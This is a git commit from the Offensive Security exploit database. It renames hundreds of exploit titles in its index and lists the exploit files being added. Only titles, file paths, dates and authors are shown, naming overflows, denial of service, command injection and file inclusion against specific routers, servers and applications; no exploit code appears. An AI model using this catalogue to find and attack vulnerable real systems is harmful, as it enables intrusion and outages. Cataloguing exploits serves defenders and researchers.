From f27338c1f79c1b009f5922c6160285b94d88882e Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 26 Sep 2017 05:01:29 +0000 Subject: [PATCH] DB: 2017-09-26 12 new exploits Apache 2.0.52 - GET Request Denial of Service Apache 2.0.52 - GET Denial of Service CUPS Server 1.1 - GET Request Denial of Service CUPS Server 1.1 - GET Denial of Service BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service BlueCoat WinProxy 6.0 R1c - GET Denial of Service TFTPD32 2.81 - GET Request Format String Denial of Service (PoC) TFTPD32 2.81 - GET Format String Denial of Service (PoC) ImgSvr 0.6.5 - (long http post) Denial of Service ImgSvr 0.6.5 - POST Denial of Service Multi-Threaded TFTP 1.1 - Long GET Request Denial of Service Multi-Threaded TFTP 1.1 - GET Denial of Service Essentia Web Server 2.15 - GET Request Remote Denial of Service Essentia Web Server 2.15 - GET Remote Denial of Service Sami HTTP Server 2.0.1 - POST Request Denial of Service Sami HTTP Server 2.0.1 - POST Denial of Service Xserver 0.1 Alpha - Post Request Remote Buffer Overflow Xserver 0.1 Alpha - POST Remote Buffer Overflow XBMC 8.10 - GET Requests Multiple Remote Buffer Overflow (PoC) XBMC 8.10 - GET Multiple Remote Buffer Overflow (PoC) Zervit Web Server 0.04 - GET Request Remote Buffer Overflow (PoC) Mereo 1.8.0 - GET Request Remote Denial of Service Zervit Web Server 0.04 - GET Remote Buffer Overflow (PoC) Mereo 1.8.0 - GET Remote Denial of Service ARD-9808 DVR Card Security Camera - GET Request Remote Denial of Service ARD-9808 DVR Card Security Camera - GET Remote Denial of Service Kolibri+ Web Server 2 - GET Request Denial of Service Kolibri+ Web Server 2 - GET Denial of Service Adobe InDesign CS3 - '.INDD' File Handling Buffer Overflow Adobe InDesign CS3 - '.INDD' Handling Buffer Overflow Sami HTTP Server 2.0.1 - GET Request Denial of Service Sami HTTP Server 2.0.1 - GET Denial of Service Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET Request Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET Exploit (Linux Kernel) ReiserFS 
3.5.28 - Potential Code Execution / Denial of Service (Linux Kernel) ReiserFS 3.5.28 - Code Execution / Denial of Service WebTrends Reporting Center for Windows 4.0 d - GET Request Buffer Overflow WebTrends Reporting Center for Windows 4.0 d - GET Buffer Overflow Working Resources BadBlue 1.7.3 - GET Request Denial of Service Working Resources BadBlue 1.7.3 - GET Denial of Service PlanetWeb 1.14 - Long GET Request Buffer Overflow PlanetWeb 1.14 - GET Buffer Overflow My Web Server 1.0.1/1.0.2 - Long GET Request Denial of Service My Web Server 1.0.1/1.0.2 - GET Denial of Service Monkey HTTP Server 0.4/0.5 - Invalid POST Request Denial of Service Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service Linksys Devices 1.42/1.43 - GET Request Buffer Overflow Linksys Devices 1.42/1.43 - GET Buffer Overflow Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service VisNetic ActiveDefense 1.3.1 - Multiple GET Request Denial of Service VisNetic ActiveDefense 1.3.1 - GET Multiple Denial of Service Pi3Web 2.0.1 - GET Request Denial of Service Pi3Web 2.0.1 - GET Denial of Service Snowblind Web Server 1.0/1.1 - GET Request Buffer Overflow Snowblind Web Server 1.0/1.1 - GET Buffer Overflow ArGoSoft Mail Server 1.8.3.5 - Multiple GET Requests Denial of Service WebBBS Pro 1.18 - GET Request Denial of Service ArGoSoft Mail Server 1.8.3.5 - GET Multiple Denial of Service WebBBS Pro 1.18 - GET Denial of Service Proxomitron Proxy Server - Long GET Request Remote Denial of Service Proxomitron Proxy Server - GET Remote Denial of Service Armida Databased Web Server 1.0 - Remote GET Request Denial of Service Armida Databased Web Server 1.0 - GET Remote Denial of Service Twilight WebServer 1.3.3.0 - 'GET' Request Buffer Overflow Twilight WebServer 1.3.3.0 - GET Buffer Overflow Sami FTP Server 1.1.3 - Library Crafted GET Request Remote Denial of Service Sami FTP Server 1.1.3 - Library Crafted GET 
Remote Denial of Service Loom Software SurfNow 1.x/2.x - Remote GET Request Denial of Service Loom Software SurfNow 1.x/2.x - GET Remote Denial of Service Sambar Server 6.0 - 'results.stm' POST Request Buffer Overflow Sambar Server 6.0 - 'results.stm' POST Buffer Overflow Linksys PSUS4 PrintServer - POST Request Denial of Service Linksys PSUS4 PrintServer - POST Denial of Service Thomson TCW690 Cable Modem ST42.03.0a - Long GET Request Denial of Service Thomson TCW690 Cable Modem ST42.03.0a - GET Denial of Service Netgear ProSafe - Denial of Service NETGEAR ProSafe - Denial of Service Multiple IEA Software Products - POST Request Denial of Service Multiple IEA Software Products - POST Denial of Service Netgear WGR614 - Administration Interface Remote Denial of Service NETGEAR WGR614 - Administration Interface Remote Denial of Service Remote Help HTTP 0.0.7 - GET Request Format String Denial of Service Remote Help HTTP 0.0.7 - GET Format String Denial of Service Geo++ GNCASTER 1.4.0.7 - GET Request Denial of Service Geo++ GNCASTER 1.4.0.7 - GET Denial of Service D-Link WBR-2310 1.0.4 - GET Request Remote Buffer Overflow D-Link WBR-2310 1.0.4 - GET Remote Buffer Overflow Polipo 1.0.4.1 - POST/PUT Requests HTTP Header Processing Denial of Service Polipo 1.0.4.1 - POST/PUT HTTP Header Processing Denial of Service CoDeSys 3.4 - HTTP POST Request Null Pointer Content-Length Parsing Remote Denial of Service CoDeSys 3.4 - HTTP POST Null Pointer Content-Length Parsing Remote Denial of Service Zoom Player - '.avi' File Divide-by-Zero Denial of Service Zoom Player - '.avi' Divide-by-Zero Denial of Service Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.SWF' File (1) Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.SWF' File (2) Adobe Flash - '.SWF' Out-of-Bounds Memory Read (1) Adobe Flash - '.SWF' Out-of-Bounds Memory Read (2) Microsoft Windows - Cursor Object Potential Memory Leak (MS15-115) Microsoft Windows - Cursor Object Memory Leak 
(MS15-115) Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (1) Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (2) Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (1) Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (2) Adobe Photoshop CC & Bridge CC - '.iff' Parsing Memory Corruption Adobe Flash - '.MP4' File Stack Corruption Adobe Flash - '.MP4' Stack Corruption Adobe Photoshop CS2 / CS3 - Unspecified '.bmp' File Buffer Overflow Adobe Photoshop CS2 / CS3 - '.bmp' Buffer Overflow Zoom Player Pro 3.30 - '.m3u' File Buffer Overflow (SEH) Zoom Player Pro 3.30 - '.m3u' Buffer Overflow (SEH) Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Potential Information Disclosure Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Information Disclosure Adrenalin Player 2.2.5.3 - '.m3u' File Buffer Overflow (SEH) (ASLR + DEP Bypass) Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) (ASLR + DEP Bypass) Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation CyberLink LabelPrint < 2.5 - Buffer Overflow (SEH Unicode) LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Request Remote Exploit LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Remote Exploit PMSoftware Simple Web Server - GET Request Remote Buffer Overflow PMSoftware Simple Web Server - GET Remote Buffer Overflow Fenice Oms 1.10 - Long GET Request Remote Buffer Overflow Fenice Oms 1.10 - GET Remote Buffer Overflow webdesproxy 0.0.1 - GET Request Remote Buffer Overflow webdesproxy 0.0.1 - GET Remote Buffer Overflow webdesproxy 0.0.1 - (exec-shield) GET Request Remote Code Execution webdesproxy 0.0.1 - (exec-shield) GET Remote Code Execution Savant Web Server 3.1 - GET Request Remote Overflow (Universal) Savant Web Server 3.1 - GET Remote Overflow (Universal) Belkin Wireless G Plus MIMO Router F5D9230-4 - 
Authentication Bypass Belkin F5D9230-4 Wireless G Plus MIMO Router - Authentication Bypass Netgear WG102 - Leaks SNMP Write Password With Read Access NETGEAR WG102 - Leaks SNMP Write Password With Read Access XBMC 8.10 (Windows) - GET Request Remote Buffer Overflow XBMC 8.10 (Windows) - GET Remote Buffer Overflow XBMC 8.10 - GET Request Remote Buffer Overflow (SEH) (Universal) XBMC 8.10 - GET Remote Buffer Overflow (SEH) (Universal) Netgear WNR2000 FW 1.2.0.8 - Information Disclosure NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure Kolibri+ Web Server 2 - GET Request Remote Overwrite (SEH) Kolibri+ Web Server 2 - GET Remote Overwrite (SEH) BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH) BigAnt Server 2.50 - GET Request Universal Remote Buffer Overflow (SEH) BigAnt Server 2.50 - GET Universal Remote Buffer Overflow (SEH) httpdx 1.4 - GET Request Buffer Overflow httpdx 1.4 - GET Buffer Overflow Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit) NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit) Proxy-Pro Professional GateKeeper 4.7 - GET Request Overflow (Metasploit) Proxy-Pro Professional GateKeeper 4.7 - GET Overflow (Metasploit) Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit) Linksys WRT54 Access Point - apply.cgi Buffer Overflow (Metasploit) Oracle Weblogic Apache Connector - POST Request Buffer Overflow (Metasploit) Oracle Weblogic Apache Connector - POST Buffer Overflow (Metasploit) Berkeley Sendmail 5.58 - Debug exploit Berkeley Sendmail 5.58 - Debug Exploit A-V Tronics InetServ 3.0 - WebMail Long GET Request A-V Tronics InetServ 3.0 - WebMail GET Exploit Light HTTPD 0.1 - GET Request Buffer Overflow (1) Light HTTPD 0.1 - GET Request Buffer Overflow (2) Light HTTPD 0.1 - GET Buffer Overflow (1) Light HTTPD 0.1 - GET Buffer Overflow (2) Netgear FM114P Wireless Firewall - File Disclosure NETGEAR FM114P Wireless Firewall - File Disclosure 
Athttpd 0.4b - Remote GET Request Buffer Overrun Athttpd 0.4b - GET Remote Buffer Overrun IA WebMail Server 3.0/3.1 - Long GET Request Buffer Overrun IA WebMail Server 3.0/3.1 - GET Buffer Overrun Monit 1.4/2.x/3/4 - Overly Long HTTP Request Buffer Overrun Monit 1.4/2.x/3/4 - Long HTTP Request Buffer Overrun KarjaSoft Sami HTTP Server 1.0.4 - GET Request Buffer Overflow KarjaSoft Sami HTTP Server 1.0.4 - GET Buffer Overflow MyWeb HTTP Server 3.3 - GET Request Buffer Overflow MyWeb HTTP Server 3.3 - GET Buffer Overflow Omnicron OmniHTTPd 2.x/3.0 - GET Request Buffer Overflow Omnicron OmniHTTPd 2.x/3.0 - GET Buffer Overflow Netgear RP114 3.26 - Content Filter Bypass NETGEAR RP114 3.26 - Content Filter Bypass Netgear DGN1000B - setup.cgi Remote Command Execution (Metasploit) NETGEAR DGN1000B - setup.cgi Remote Command Execution (Metasploit) Netgear DGN2200B - pppoe.cgi Remote Command Execution (Metasploit) NETGEAR DGN2200B - pppoe.cgi Remote Command Execution (Metasploit) Netgear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow NETGEAR MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow Netgear ReadyNAS - Perl Code Evaluation (Metasploit) NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit) Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting Zoom Player 3.30/5/6 - Crafted '.ZPL' File Error Message Arbitrary Code Execution Zoom Player 3.30/5/6 - '.ZPL' Error Message Arbitrary Code Execution Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow Ultra Mini HTTPD 1.21 - POST Stack Buffer Overflow Kolibri Web Server 2.0 - GET Request Stack Buffer Overflow Kolibri Web Server 2.0 - GET Stack Buffer Overflow NetGear WNR2000 - Multiple Information Disclosure Vulnerabilities NETGEAR WNR2000 - 
Multiple Information Disclosure Vulnerabilities HTTP 1.1 - GET Request Directory Traversal HTTP 1.1 - GET Directory Traversal Kolibri Web Server 2.0 - GET Request (SEH) D-Link Devices - 'info.cgi' POST Request Buffer Overflow (Metasploit) Kolibri Web Server 2.0 - GET Exploit (SEH) D-Link Devices - 'info.cgi' POST Buffer Overflow (Metasploit) Belkin n750 - jump login Parameter Buffer Overflow Belkin N750 - jump login Parameter Buffer Overflow Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities Belkin Wireless Router Default - WPS PIN Security Belkin Wireless Router - Default WPS PIN Security Easy File Sharing Web Server 7.2 - GET Request Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - GET Buffer Overflow (SEH) Netgear D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution NETGEAR D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution Netgear ProSafe Network Management System NMS300 - Arbitrary File Upload (Metasploit) NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit) NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities NUUO NVRmini2 / NVRsolo / Crystal Devices / NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities NETGEAR ADSL Router JNR1010 - Authenticated Remote File Disclosure NETGEAR ADSL Router WNR500/WNR612v3/JNR1010/JNR2010 - Authenticated Remote File Disclosure NETGEAR JNR1010 ADSL Router - Authenticated Remote File Disclosure NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - Authenticated Remote File Disclosure Netgear R7000 and R6400 - 'cgi-bin' Command Injection (Metasploit) NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit) Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - GET 'PassWD' Buffer Overflow (SEH) 
Supervisor 3.0a1 - 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit) Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit) NETGEAR DGN2200 - dnslookup.cgi Command Injection (Metasploit) Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass) Easy File Sharing Web Server 7.2 - GET 'PassWD' Buffer Overflow (DEP Bypass) Belkin NetCam F7D7601 - Multiple Vulnerabilities Belkin F7D7601 NetCam - Multiple Vulnerabilities Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit) Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit) Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH) Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow Quezza BB 1.0 - (quezza_root_path) File Inclusion Quezza BB 1.0 - 'quezza_root_path' File Inclusion The Bible Portal Project 2.12 - (destination) File Inclusion The Bible Portal Project 2.12 - 'destination' File Inclusion Vivvo Article Manager 3.2 - (classified_path) File Inclusion Vivvo Article Manager 3.2 - 'classified_path' File Inclusion Forum82 < 2.5.2b - (repertorylevel) Multiple File Inclusion Forum82 < 2.5.2b - 'repertorylevel' Multiple File Inclusion OpenDock Easy Doc 1.4 - (doc_directory) File Inclusion OpenDock Easy Blog 1.4 - (doc_directory) File Inclusion WebYep 1.1.9 - (webyep_sIncludePath) File Inclusion OpenDock Easy Gallery 1.4 - (doc_directory) File Inclusion OpenDock Easy Doc 1.4 - 'doc_directory' File Inclusion OpenDock Easy Blog 1.4 - 'doc_directory' File Inclusion WebYep 1.1.9 - 'webyep_sIncludePath' File Inclusion OpenDock Easy Gallery 1.4 - 'doc_directory' File Inclusion Open Conference Systems 1.1.4 - (fullpath) File Inclusion Open Conference Systems 1.1.4 - 'fullpath' File Inclusion SpeedBerg 1.2beta1 - (SPEEDBERG_PATH) File Inclusion SpeedBerg 1.2beta1 - 'SPEEDBERG_PATH' File Inclusion PhpShop Core 0.9.0 RC1 - (PS_BASE) File Inclusion PhpShop Core 0.9.0 RC1 - 'PS_BASE' File Inclusion 
Phpjobscheduler 3.0 - (installed_config_file) File Inclusion Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion Magic Photo Storage Website - _config[site_path] File Inclusion Magic Photo Storage Website - '_config[site_path]' File Inclusion Linksys Cisco WAG120N - Cross-Site Request Forgery Cisco Linksys WAG120N - Cross-Site Request Forgery Belkin G Wireless Router F5D7234-4 v5 - Exploit Belkin F5D7234-4 v5 G Wireless Router - Exploit Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery PHP-Nuke 6.x/7.x - Modpath Parameter Potential File Inclusion PHP-Nuke 6.x/7.x - 'Modpath' Parameter File Inclusion Netgear SPH200D - Multiple Vulnerabilities NETGEAR SPH200D - Multiple Vulnerabilities Netgear DGN1000B - Multiple Vulnerabilities NETGEAR DGN1000B - Multiple Vulnerabilities Netgear DGN2200B - Multiple Vulnerabilities NETGEAR DGN2200B - Multiple Vulnerabilities Netgear WNR1000 - Authentication Bypass NETGEAR WNR1000 - Authentication Bypass PHPMyVisites 1.3 - Set_Lang File Inclusion PHPMyVisites 1.3 - 'Set_Lang' File Inclusion PPA 0.5.6 - ppa_root_path File Inclusion PPA 0.5.6 - 'ppa_root_path' File Inclusion Netgear WPN824v3 - Unauthorized Config Download NETGEAR WPN824v3 - Unauthorized Config Download Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities Netgear ProSafe - Information Disclosure NETGEAR ProSafe - Information Disclosure Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit) NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit) Simple Machines Forum (SMF) 1.1.6 - POST Request Filter Security Bypass Simple Machines Forum (SMF) 1.1.6 - POST Filter Security Bypass Netgear N600 Wireless Dual Band WNDR3400 - Multiple Vulnerabilities NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities Belkin Router AC1200 Firmware 1.00.27 
- Authentication Bypass Belkin AC1200 Router Firmware 1.00.27 - Authentication Bypass Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure ManageEngine ADSelfService Plus 4.4 - POST Request Manipulation Security Question ManageEngine ADSelfService Plus 4.4 - POST Manipulation Security Question Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities Belkin Router N150 1.00.08/1.00.09 - Directory Traversal Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / Denial of Service) eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service) Belkin N150 Wireless Home Router F9K1009 v1 - Multiple Vulnerabilities Belkin N150 Wireless Router F9K1009 v1 - Multiple Vulnerabilities Netgear WNR1000v4 - Authentication Bypass NETGEAR WNR1000v4 - Authentication Bypass Netgear ProSafe Network Management System NMS300 - Multiple Vulnerabilities NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities Netgear R7000 - Command Injection Netgear R7000 - Cross-Site Scripting NETGEAR R7000 - Command Injection NETGEAR R7000 - Cross-Site Scripting Tenda N3 Wireless N150 Home Router - Authentication Bypass Tenda N3 Wireless N150 Router - Authentication Bypass DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit) Lending And Borrowing - 'pid' Parameter SQL Injection Multi Level Marketing - SQL Injection Cash 
Back Comparison Script 1.0 - SQL Injection Claydip Airbnb Clone 1.0 - Arbitrary File Upload Secure E-commerce Script 1.02 - 'sid' Parameter SQL Injection PHP Auction Ecommerce Script 1.6 - SQL Injection JitBit HelpDesk < 9.0.2 - Authentication Bypass
---
 files.csv | 336 ++++++------
 platforms/asp/webapps/42776.txt | 13 +
 platforms/linux/remote/42779.rb | 169 ++++++
 platforms/linux/webapps/42769.rb | 103 ++++
 platforms/php/webapps/42761.txt | 3 +-
 platforms/php/webapps/42770.txt | 27 +
 platforms/php/webapps/42771.txt | 30 ++
 platforms/php/webapps/42772.pl | 59 +++
 platforms/php/webapps/42773.txt | 73 +++
 platforms/php/webapps/42774.txt | 41 ++
 platforms/php/webapps/42775.txt | 41 ++
 platforms/win_x86-64/remote/42030.py | 170 +++---
 platforms/win_x86-64/remote/42031.py | 172 ++++---
 platforms/windows/local/42777.py | 154 ++++++
 platforms/windows/remote/42315.py | 739 ++++++++++++++++++++++-----
 platforms/windows/remote/42778.py | 89 ++++
 platforms/windows/remote/42780.py | 75 +++
 17 files changed, 1846 insertions(+), 448 deletions(-)
 create mode 100755 platforms/asp/webapps/42776.txt
 create mode 100755 platforms/linux/remote/42779.rb
 create mode 100755 platforms/linux/webapps/42769.rb
 create mode 100755 platforms/php/webapps/42770.txt
 create mode 100755 platforms/php/webapps/42771.txt
 create mode 100755 platforms/php/webapps/42772.pl
 create mode 100755 platforms/php/webapps/42773.txt
 create mode 100755 platforms/php/webapps/42774.txt
 create mode 100755 platforms/php/webapps/42775.txt
 create mode 100755 platforms/windows/local/42777.py
 create mode 100755 platforms/windows/remote/42778.py
 create mode 100755 platforms/windows/remote/42780.py
diff --git a/files.csv b/files.csv
index b65030668..980a020fb 100644
--- a/files.csv
+++ b/files.csv
@@ -140,7 +140,7 @@ id,file,description,date,author,platform,type,port
 843,platforms/windows/dos/843.c,"KNet Web Server 1.04c - Buffer Overflow Denial of Service",2005-02-25,CorryL,windows,dos,0
 849,platforms/windows/dos/849.c,"Scrapland 1.0 - Server Termination Denial of Service",2005-02-28,"Luigi Auriemma",windows,dos,0
 852,platforms/windows/dos/852.py,"Trillian Basic 3.0 - '.png' Image Processing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,dos,0
-855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - GET Request Denial of Service",2005-03-04,GreenwooD,multiple,dos,0
+855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - GET Denial of Service",2005-03-04,GreenwooD,multiple,dos,0
 856,platforms/hardware/dos/856.c,"Nokia Symbian 60 - 'BlueTooth Nickname' Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0
 861,platforms/windows/dos/861.c,"Microsoft Windows XP/2003 - Remote Denial of Service",2005-03-07,RusH,windows,dos,0
 867,platforms/multiple/dos/867.c,"Ethereal 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0
@@ -218,7 +218,7 @@ id,file,description,date,author,platform,type,port
 1175,platforms/cgi/dos/1175.pl,"GTChat 0.95 Alpha - 'adduser' Remote Denial of Service",2005-08-23,VTECin5th,cgi,dos,0
 1176,platforms/multiple/dos/1176.c,"Ventrilo 2.3.0 (All Platforms) - Remote Denial of Service",2005-08-23,"Luigi Auriemma",multiple,dos,0
 1192,platforms/windows/dos/1192.cpp,"P2P Pro 1.0 - 'command' Denial of Service",2005-09-02,basher13,windows,dos,0
-1196,platforms/linux/dos/1196.c,"CUPS Server 1.1 - GET Request Denial of Service",2005-09-05,tracewar,linux,dos,0
+1196,platforms/linux/dos/1196.c,"CUPS Server 1.1 - GET Denial of Service",2005-09-05,tracewar,linux,dos,0
 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service",2005-09-06,Sowhat,windows,dos,0
 1204,platforms/multiple/dos/1204.html,"Mozilla Products - 'Host:' Buffer Overflow Denial of Service String",2005-09-09,"Tom Ferris",multiple,dos,0
 1212,platforms/windows/dos/1212.pl,"COOL! Remote Control 1.12 - Remote Denial of Service",2005-09-11,basher13,windows,dos,0
@@ -270,12 +270,12 @@ id,file,description,date,author,platform,type,port
 1390,platforms/multiple/dos/1390.c,"BZFlag 2.0.4 - (undelimited string) Denial of Service",2005-12-27,"Luigi Auriemma",multiple,dos,0
 1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6 - 'mshtml.dll div' Denial of Service",2005-12-29,rgod,windows,dos,0
 1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - HTTP Request Denial of Service",2005-12-29,Lympex,windows,dos,0
-1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service",2006-01-07,FistFuXXer,windows,dos,0
+1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Denial of Service",2006-01-07,FistFuXXer,windows,dos,0
 1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - Reboot (Denial of Service)",2006-01-10,kokanin,hardware,dos,0
 1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 - (NLST) Denial of Service",2006-01-14,pi3ch,windows,dos,0
 1422,platforms/windows/dos/1422.c,"Cerberus FTP Server 2.32 - Denial of Service",2006-01-16,pi3ch,windows,dos,0
 1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0
-1424,platforms/windows/dos/1424.pl,"TFTPD32 2.81 - GET Request Format String Denial of Service (PoC)",2006-01-19,"Critical Security",windows,dos,0
+1424,platforms/windows/dos/1424.pl,"TFTPD32 2.81 - GET Format String Denial of Service (PoC)",2006-01-19,"Critical Security",windows,dos,0
 1447,platforms/hardware/dos/1447.c,"Cisco Aironet Wireless Access Points - Memory Exhaustion ARP (Denial of Service)",2006-01-25,Pasv,hardware,dos,0
 1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 - (TelnetD) Remote Denial of Service",2006-02-02,"Fabian Ramirez",hardware,dos,0
 1473,platforms/hardware/dos/1473.c,"Sony/Ericsson Bluetooth - (Reset Display) Denial of Service",2006-02-06,"Pierre Betouin",hardware,dos,0
@@ -358,7 +358,7 @@ id,file,description,date,author,platform,type,port
 1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 - (iframe) Remote Denial of Service",2006-07-01,y3dips,multiple,dos,0
 1976,platforms/windows/dos/1976.cpp,"Quake 3 Engine Client - 'CG_ServerCommand()' Remote Overflow",2006-07-02,RunningBon,windows,dos,0
 1977,platforms/win_x86/dos/1977.cpp,"Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,win_x86,dos,0
-1980,platforms/windows/dos/1980.pl,"ImgSvr 0.6.5 - (long http post) Denial of Service",2006-07-04,n00b,windows,dos,0
+1980,platforms/windows/dos/1980.pl,"ImgSvr 0.6.5 - POST Denial of Service",2006-07-04,n00b,windows,dos,0
 1984,platforms/windows/dos/1984.py,"WinRAR 3.60 Beta 6 - (SFX Path) Stack Overflow",2006-07-05,posidron,windows,dos,0
 1989,platforms/windows/dos/1989.html,"Microsoft Internet Explorer 6 - Table.Frameset NULL Dereference",2006-07-07,"Aviv Raff",windows,dos,0
 1990,platforms/windows/dos/1990.html,"Microsoft Internet Explorer 6 - 'Internet.HHCtrl' Heap Overflow",2006-07-07,"H D Moore",windows,dos,0
@@ -389,7 +389,7 @@ id,file,description,date,author,platform,type,port
 2246,platforms/hardware/dos/2246.cpp,"2WIRE Modems/Routers - 'CRLF' Denial of Service",2006-08-22,preth00nker,hardware,dos,0
 2302,platforms/windows/dos/2302.pl,"J. River Media Center 11.0.309 - Remote Denial of Service (PoC)",2006-09-05,n00b,windows,dos,0
 2303,platforms/multiple/dos/2303.html,"dsock 1.3 - (buf) Remote Buffer Overflow (PoC)",2006-09-05,DaveK,multiple,dos,0
-2334,platforms/windows/dos/2334.py,"Multi-Threaded TFTP 1.1 - Long GET Request Denial of Service",2006-09-08,n00b,windows,dos,0
+2334,platforms/windows/dos/2334.py,"Multi-Threaded TFTP 1.1 - GET Denial of Service",2006-09-08,n00b,windows,dos,0
 2400,platforms/windows/dos/2400.html,"Microsoft Internet Explorer - (VML) Remote Denial of Service (PoC)",2006-09-19,Shirkdog,windows,dos,0
 2444,platforms/multiple/dos/2444.sh,"OpenSSH 4.3 p1 - (Duplicated Block) Remote Denial of Service",2006-09-27,"Tavis Ormandy",multiple,dos,0
 2515,platforms/multiple/dos/2515.txt,"Kmail 1.9.1 - (IMG SRC) Remote Denial of Service",2006-10-11,nnp,multiple,dos,0
@@ -411,7 +411,7 @@ id,file,description,date,author,platform,type,port
 2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)",2006-11-01,"H D Moore",hardware,dos,0
